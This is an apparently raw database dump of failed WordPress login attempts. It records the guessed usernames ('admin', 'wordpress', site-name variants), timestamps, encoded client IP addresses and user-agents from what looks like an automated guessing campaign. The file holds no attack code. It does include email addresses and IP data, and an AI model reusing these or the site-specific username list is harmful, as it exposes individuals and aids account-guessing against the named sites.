(9251, 33016, 1694685161.262346, 1, 'loginFailInvalidUsername', 'happythinking@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg“TŽ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9252, 33017, 1694685170.236275, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¸l', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9253, 33018, 1694685178.071762, 1, 'loginFailInvalidUsername', 'happythinking.com123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg]ù\n', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9254, 33019, 1694685182.099649, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹§\Z*', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9255, 33020, 1694685187.617683, 1, 'loginFailInvalidUsername', 'happythinking.com123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈQ~<', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9256, 33021, 1694685197.784557, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶ýâ‚', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9257, 33022, 1694685200.576918, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ó$\Z', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9258, 33023, 1694685203.724848, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|ž¸5', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9259, 33024, 1694685211.121148, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿnˆÛ.', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9260, 33025, 1694685214.134864, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgSÔc', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9054, 32376, 1694031250.441397, 1, 'loginFailInvalidUsername', 'lovely', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq³Û\Z', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9055, 32377, 1694031252.071412, 1, 'loginFailInvalidUsername', 'www.happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ*t®¡', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9056, 32378, 1694031253.508769, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ.F¸·', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9057, 32379, 1694031255.238967, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ½“9', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9058, 32380, 1694031259.331628, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿv­çæ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9059, 32381, 1694031261.193639, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)oj=', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9060, 32382, 1694031264.607362, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿN£°¥', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9061, 32383, 1694031266.914441, 1, 'loginFailInvalidUsername', 'www.happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿPbºŸ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9062, 32384, 1694031270.647768, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ^ã\ZV', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9063, 32385, 1694031273.623906, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg5,Ú', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9064, 32386, 1694031276.861327, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ^ÐU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9065, 32387, 1694031277.271803, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$O‘', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9066, 32388, 1694031281.654323, 1, 'loginFailInvalidUsername', 'www.happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿËc±~', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9067, 32389, 1694031284.406532, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}¥mœ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9068, 32390, 1694031287.294061, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÂqÇ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9069, 32391, 1694031289.574204, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿmíÂ°', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9070, 32392, 1694031290.673230, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿO*ÂÜ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9071, 32393, 1694031293.985068, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿoX&ø', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9072, 32394, 1694031309.479718, 1, 'loginFailInvalidUsername', 'howequipmentworks', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\†å', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9073, 32395, 1694031311.365973, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿQ\ZË#', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9074, 32396, 1694031313.189360, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ ¾þ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9075, 32397, 1694031318.805849, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsTL', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9076, 32398, 1694031322.875173, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÛ\\T›', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9077, 32399, 1694031325.884024, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿº°"M', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9078, 32400, 1694031327.031477, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±hñM', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9079, 32401, 1694031330.224699, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾k%Ú', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9080, 32402, 1694031332.166032, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·jY–', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9081, 32403, 1694031334.836247, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹0•¡', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9082, 32404, 1694031336.206937, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-¶', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9083, 32405, 1694031338.434530, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼4ÂQ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9084, 32406, 1694031344.750498, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«€"', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9085, 32407, 1694031347.786938, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg”-©', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9086, 32408, 1694031353.782726, 1, 'loginFailInvalidUsername', 'howequipmentworks.com!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn,z’', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9087, 32409, 1694031357.178235, 1, 'loginFailInvalidUsername', 'lovely', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿš²‘V', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9088, 32410, 1694031363.472892, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg‚s', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9089, 32411, 1694031382.171099, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ[—ïE', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9090, 32412, 1694031385.312836, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºûÅR', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9091, 32413, 1694031390.667476, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿß&', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9092, 32414, 1694031393.217438, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÕÁ¾', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9093, 32415, 1694031396.384843, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«îå', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9094, 32416, 1694031426.305843, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµ.¦ô', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9095, 32417, 1694031431.009209, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿ •', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9096, 32418, 1694031447.353651, 1, 'loginFailInvalidUsername', 'howequipmentworks', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÕ±ËÝ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9097, 32419, 1694031452.945726, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)fÛ	', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9098, 32420, 1694031463.205874, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ%ó½X', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9099, 32421, 1694031466.497146, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³.(', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9100, 32422, 1694031471.517912, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgªåž', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9101, 32423, 1694031483.612011, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)M›', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9102, 32424, 1694031494.061811, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿvF\rþ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9103, 32425, 1694031514.313918, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgå/x', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9104, 32426, 1694031533.528121, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$QYß', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9105, 32427, 1694031535.692502, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿœß\r8', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9106, 32428, 1694031541.884779, 1, 'loginFailInvalidUsername', 'www.happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}¥jÍ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9107, 32429, 1694031545.452588, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³úµ¢', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9108, 32430, 1694031548.027156, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈ.—*', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9109, 32431, 1694031553.965071, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ™UÚ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9110, 32432, 1694031556.211352, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅ%Ñ²', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9111, 32433, 1694031559.313785, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgã\\;', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9112, 32434, 1694031565.559392, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´òYî', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9113, 32435, 1694031569.279031, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾Š”A', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9114, 32436, 1694031572.013284, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÕ7_Í', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9115, 32437, 1694031576.939929, 1, 'loginFailInvalidUsername', 'lovely', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿPaÎ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9116, 32438, 1694031584.662343, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄKËÕ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9117, 32439, 1694031587.844935, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅ&Ü^', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9208, 32978, 1694684960.330700, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)‹û6', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9209, 32979, 1694684983.149598, 1, 'loginFailInvalidUsername', 'happythinking@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"?\r', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9210, 32979, 1694684983.165366, 1, 'loginFailInvalidUsername', 'happythinking@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"?\r', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9211, 32980, 1694684986.572234, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq Ï(', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9212, 32981, 1694684989.163135, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)&£j', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9213, 32982, 1694684994.423726, 1, 'loginFailInvalidUsername', 'happythinking.com1', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»ÔgO', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9214, 32983, 1694684997.901644, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿqL¾', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9215, 32984, 1694685002.623811, 1, 'loginFailInvalidUsername', '000521521000', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$D5+', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9216, 32984, 1694685002.637661, 1, 'loginFailInvalidUsername', '000521521000', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$D5+', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9217, 32985, 1694685010.038798, 1, 'loginFailInvalidUsername', '000521521000123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ò×Y', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9218, 32986, 1694685013.850131, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄF7\r', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9219, 32987, 1694685017.327059, 1, 'loginFailInvalidUsername', 'happythinking@verizon.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¤û}', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9220, 32988, 1694685022.706933, 1, 'loginFailInvalidUsername', '3ddaaade350b269e', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÂ\ZÆ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9221, 32989, 1694685026.201134, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuÖ¤€', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(8833, 31630, 1692901834.607104, 1, 'loginFailInvalidUsername', 'howequipmentworks!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$IÉ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8834, 31631, 1692901839.840652, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)ÈOû', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8835, 31632, 1692901847.344562, 1, 'loginFailInvalidUsername', 'happythinking!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾§F{', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8836, 31633, 1692901849.917029, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹êêT', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8837, 31634, 1692901852.843489, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg¤ðc', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8838, 31635, 1692901857.460745, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿà’', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8839, 31636, 1692901860.512514, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿXrS', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
